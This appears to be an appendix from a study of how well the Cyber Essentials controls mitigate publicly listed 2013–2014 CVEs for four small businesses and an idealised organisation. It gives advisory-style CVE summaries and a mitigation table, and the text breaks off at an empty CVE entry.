CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.

Survey Responses



Cyber Controls Applicability

The columns SME1 to SME4 and Idealised carry the y/n value recorded for each of the four SMEs and for the idealised organisation; No CE and With CE give the mitigation status without and with the Cyber Essentials controls in place.

| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |


CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant_name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492
Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736
